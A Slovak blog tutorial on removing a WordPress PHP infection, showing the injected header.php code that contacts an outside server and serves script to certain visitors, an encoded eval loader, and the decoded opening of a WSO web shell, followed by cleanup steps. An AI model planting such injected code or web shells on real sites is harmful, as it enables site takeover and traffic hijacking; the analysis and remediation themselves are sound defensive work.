odstrániť WordPress PHP Virus

Tento tutoriál predstavuje konkrétny prípad, keď blog WordPress bolo to infikované. Odstránenie WordPress PHP vírus.

Onedlho som si všimol podozrivý kód, pre ktorý sa zdá byť PHP vírus WordPress. Nasledujúci PHP kód bol prítomný v header.php, pred čiarou </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Toto je nejaký PHP kód, ktorý vyzerá, akoby sa pokúšal získať obsah zdroja z externého servera, ale časť, ktorá odkazuje na URL, je neúplná.

Pracovný mechanizmus je o niečo zložitejší a robí to WordPress PHP Virus neviditeľný pre návštevníkov postihnutých stránok. Namiesto toho sa zameriava na vyhľadávače (Google) a implicitne vedie k výraznému zníženiu počtu návštevníkov dotknutých webových stránok.

Podrobnosti o malvéri WordPress PHP Virus

1. Vyššie uvedený kód je prítomný v header.php.

2. Na serveri sa objavil súbor wp-log.php v priečinku wp-includes.

3. wp-log.php obsahuje zašifrovaný kód, ktorý sa však dá pomerne ľahko dešifrovať.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Dešifrovať malvérový kód z wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Zdá sa, že ide o škodlivý skript PHP, ktorý obsahuje kód na spracovanie autentifikácie a akcií so súbormi a adresármi na serveri. Je veľmi ľahké vidieť, že tento skript obsahuje premenné ako $auth_pass (overovacie heslo), $default_action (predvolená akcia), $default_use_ajax (štandardne používa Ajax) a $default_charset (predvolené nastavenie znakov).

Je zrejmé, že tento skript má sekciu, ktorá kontroluje používateľských agentov HTTP, aby zablokovali prístup k určitým webovým robotom, ako sú vyhľadávacie nástroje. Má tiež sekciu, ktorá kontroluje bezpečnostný režim PHP a nastavuje určité pracovné adresáre.

4. Ak sa v prehliadači otvorí wp-log.php, zobrazí sa webová stránka s poľom prihlásenie. Na prvý pohľad sa zdá, že je to správca súborov, cez ktorý možno jednoducho nahrať nové súbory na cieľový server.

Ako devirujete webovú stránku WordPress?

Manuálny devírusový proces vždy zahŕňa najprv zistenie a pochopenie toho, o akú zraniteľnosť ide.

1. Vytvorte zálohu pre celú webovú stránku. To musí zahŕňať súbory aj databázu.

2. Určite, ako dlho sa vírus vyskytuje, a vyhľadajte na webovom serveri upravené alebo novovytvorené súbory v približnom časovom rámci.

Napríklad, ak chcete vidieť súbory .php vytvorené alebo upravené za posledný týždeň, spustite príkaz na serveri:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

Je to jednoduchá metóda, pomocou ktorej môžete odhaliť súbory WordPress infikované a tie, ktoré obsahujú škodlivý kód.

3. Skontrolujte súbor .htaccess podozrivých smerníc. Riadky povolení alebo vykonávanie skriptu.

4. Skontrolujte databázu. Je dosť možné, že niektoré príspevky a stránky WordPress upravovať pomocou malvéru alebo pridávať nové používateľov s rolou administrator.

5. Skontrolujte oprávnenia na zápis pre priečinky a súbory. chmod şi chown.

Odporúčané povolenia sú: 644 pre súbory a 755 pre adresáre.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Aktualizujte všetky WordPress Plugins / WordPress Themes.

Súvisiace: Fix Redirect WordPress Hack 2023 (Vírus presmerovania)

Toto sú "základné" metódy, pomocou ktorých môžete devirovať webovú stránku / blog WordPress. Ak máte problémy a potrebujete pomoc, sekcia komentárov je otvorená.

Zanietený technológiou, s radosťou píšem na StealthSettings.com od roku 2006. Mám bohaté skúsenosti s operačnými systémami: macOS, Windows a Linux, ako aj s programovacími jazykmi a platformami pre blogovanie (WordPress) a pre online obchody (WooCommerce, Magento, PrestaShop).

Ako » WordPress » odstrániť WordPress PHP Virus
Pridať komentár